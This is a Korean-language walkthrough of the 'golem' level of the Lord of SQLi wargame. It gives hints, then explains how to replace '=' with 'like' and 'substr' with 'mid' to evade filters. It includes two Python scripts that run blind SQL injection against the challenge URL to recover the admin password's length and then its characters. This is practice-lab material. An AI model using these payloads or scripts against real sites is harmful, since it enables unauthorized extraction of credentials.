[LOS] – golem 힌트 및 풀이

힌트1.   or,and 우회 기법은 알것이다. 이번에는 = 을 막고 있다. 우회 방법은?

힌트2.   그렇다. blind…

힌트3.   그런데 substr을 막고 있다. 우회 방법은?

 

 

 

 

 

 

 

 

풀이.
이번 문제는 나에게 새로운 우회 방법을 가르쳐 준 문제이다.
= 을 우회하기 위해서는 like 를 사용하면 된다.
일단 admin으로 로그인을 해보자
?pw=1′ || id like ‘admin

여기까지 했으니 admin의 pw를 알아낼 수 있다.
pw길이를 알아내보자.
1′ || id like ‘admin’ %26%26 length(pw) like 1%23

 

 

import requests
import string
import time

wordList=['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','0','1','2','3','4','5','6','7','8','9','0','!','@','#','$','%','^','&','*','(',')']
result = ''
header = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36',
			'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
			'Accept-Language' : 'ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7',
			'Cookie': 'PHPSESSID=값값값값값',
			'Connection': 'close'
	     }		


'''
######## Find the password length #######
'''

print("Searching password length...")
for count in range(1,20):
	time.sleep(0.5)
	url = "http://los.eagle-jump.org/golem_39f3348098ccda1e71a4650f40caa037.php?pw=1' || id like 'admin' %26%26 length(pw) like "+str(count)+"%23"
	req = requests.get(url, headers=header)
	print(url) 			
	if req.text.find("<h2>Hello admin</h2>") != -1:		# if not found, return -1
		print("password length : %d" % count)
		break

 

 

 

그런데 substr을 막고 있다. 우회 기법을 찾아 봤는데 left,right,mid 라는 함수들이 있더라. (처음알음..)
나는 mid를 이용해서 python과 함께(?) 문제를 풀었다.

 

import requests
import string
import time

wordList=['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','0','1','2','3','4','5','6','7','8','9','0','!','@','#','$','%','^','&','*','(',')']
header = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36',
			'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
			'Accept-Language' : 'ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7',
			'Cookie': 'PHPSESSID=ep5kj560e636jh9p6d21h7vc14',
			'Connection': 'close'
	     }		

passwdLen=8
print("Searching password...")
for count in range(1,passwdLen+1):
	for string in range(len(wordList)):
		time.sleep(2)
		url = "http://los.eagle-jump.org/golem_39f3348098ccda1e71a4650f40caa037.php?pw=1' || id like 'admin' %26%26 mid(pw,"+str(count)+",1) like '"+str(wordList[string])+"'%23"
		req = requests.get(url, headers=header)
		print(url)
		if req.text.find("<h2>Hello admin</h2>") != -1:	# if not found, return -1	
			print(wordList[string])
			break